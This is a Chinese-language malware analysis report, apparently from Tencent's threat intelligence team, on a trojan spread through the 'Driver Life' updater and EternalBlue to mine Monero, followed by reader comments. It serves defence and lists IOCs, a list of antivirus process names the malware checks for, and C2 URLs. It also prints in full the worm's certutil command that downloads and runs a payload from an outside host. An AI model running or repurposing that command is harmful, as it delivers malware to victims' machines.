“驱动人生”木马详细分析报告 2小时感染10万台电脑挖门罗币

叶月金

腾讯安全御见威胁情报中心监测发现，一款通过“驱动人生”升级通道，并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发，仅2个小时受攻击用户就高达10万。“驱动人生”木马会利用高危漏洞在企业内网呈蠕虫式传播，并进一步下载云控木马，在中毒电脑进行门罗币挖矿。

一、概述

12月14日下午，腾讯安全御见威胁情报中心监测发现，一款通过“驱动人生”升级通道，并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发，仅2个小时受攻击用户就高达10万。

“驱动人生”木马会利用高危漏洞在企业内网呈蠕虫式传播，并进一步下载云控木马，在中毒电脑上进行门罗币挖矿。云控木马对企业信息安全威胁巨大，企业用户须重点关注。

该病毒爆发刚好是周末时间，令企业网管猝不及防，周一工作日员工电脑开机后，建议立刻查杀病毒，再使用杀毒软件的漏洞修复功能安装系统补丁。个人电脑用户使用腾讯电脑管家即可防御。

本次病毒爆发有三个特点：

1.驱动人生升级通道传播的病毒会在中毒电脑安装云控木马；

2.病毒会利用永恒之蓝漏洞在局域网内主动扩散；

3.通过云端控制收集中毒电脑部分信息，接受云端指令在中毒电脑进行门罗币挖矿。




木马攻击流程图

二、详细分析

dtlupg.exe拜候以下url下载病毒

hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

（注意，为避免网友点击以上链接可以直接下载病毒程序，对部分字符做了隐藏处理）

病毒文件释放在：

C:\Program Files (x86)\DTLSoft\rili\Updater\ctrlf\f79cb9d2893b254cc75dfb7f3e454a69.exe等位置执行。

f79cb9d2893b254cc75dfb7f3e454a69.exe 运行后最终释放出 C:\WINDOWS\Temp\svvhost.exe

（MD5：2E9710A4B9CBA3CD11E977AF87570E3B）运行，svvhost.exe打包了“永恒之蓝”等漏洞攻击工具在表里网进一步扩散。

2.1 病毒母体

F79CB9D2893B254CC75DFB7F3E454A69.exe

运行后将自身拷贝到C:\windows\system32\svhost.exe，安装为办事并启动，办事名为Ddiver，并在随后拉起云控模块svhhost.exe、攻击模块svvhost.exe。

运行时先检测互斥体，确定是否已感染过。





通过检测以下进程将杀软信息搜集准备上传。

360tray.exe|360sd.exe|avp.exe|KvMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe





检测到任务办理器及游戏进程则将云控模块svhhost.exe退出。





打开互斥体，对象名称为"I am tHe xmr reporter" ，xmr意指xmrig.exe矿机。





搜集系统敏感信息上传到hxxp://i.haqo.net/i.png,并接受返回的云控代码等待执行。





母体设置进程共享内存HSKALWOEDJSLALQEOD





2.2 挖矿

云控木马svhhost.exe其主要功能是，从母体进程svhost.exe共享内存中读取shellcode解密并执行，每隔2000秒读取一次共享内存中的shellcode进行解密执行，共享内存名为HSKALWOEDJSLALQEOD，目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行





云控木马执行流程

云控木马运行后会创建一个线程，该线程函数主要功能是判断进程svhost.exe(母体进程)是否存在，不存在的话则启动该进程，接下来要读取的共享内存数据就是从该进程进行读取





创建线程判断母体进程是否存在

调用OpenFileMappingA打开共享内存，读取共享内存数据





读取共享内存数据

调用RtlDecompressBuffer函数解压共享内存中的数据，为下一步执行做准备




解压共享内存数据

共享内存数据加压完后会执行，目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行





执行shellcode





尝试挖矿时通信IP为172.105.204.237





2.3 攻击模块

攻击模块从地址hxxp://dl.haqo.net/eb.exez下载，作为子进程Svvhost.Exe启动，分析发现该文件是通过python实现的“永恒之蓝”漏洞利用模块压缩打包程序。

子进程Svvhost.Exe为将python实现的“永恒之蓝”漏洞利用模块压缩打包程序。





Mysmb.pyo为攻击时扫描代码。





GitHub上也可以看到相关开源代码





扫描内网445端口进行攻击





不仅攻击内网漏洞机器，还随机找几个外网IP尝试攻击，1次攻击完后沉默20分钟





攻击成功后paylaod在中招机器执行以下命令进行内网扩散传播

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

安全建议

1. 办事器暂时关闭不必要的端口（如135、139、445），方法可参考：https://guanjia.qq.com/web_clinic/s8/585.html

2. 企业用户在周一上班后，建议使用腾讯御点查杀病毒（个人用户可使用腾讯电脑管家），然后使用漏洞修复功能，修复全网终端存在的系统高危漏洞；

3. 办事器使用高强度密码，切勿使用弱口令，防止黑客暴力破解；

4. 使用杀毒软件拦截可能的病毒攻击；

5. 保举企业用户安排腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。
<div class="pgc-img">

O宿命o

驱动人生，驱动精灵，用完就卸载。不卸载我的电脑会莫名其妙装上金山毒霸。。

hersueye

MacOS没啥感觉啊，登陆密码都没有，你倒是来啊

aa斐然

这是怎么得到源代码的[捂脸]给我们吃瓜群众科普一下

心想事成了

别说现在没电脑病毒了，说不定你的电脑正帮别人挖矿

夢菲兒

我不信腾讯电脑管家能检测出电脑病毒，看没人用了做广告的吧？

☆→冰←★

没装驱动人生也忽然感染了，应该是通过人生日历进来的，火绒自动查杀了！

kenuy

以第一时间卸载

Coolf

为什么不消360，要推腾讯电脑管家

ヅ叚娤

我装了驱动人生，然后每晚到后半夜自动开机，我还检查了电源设置。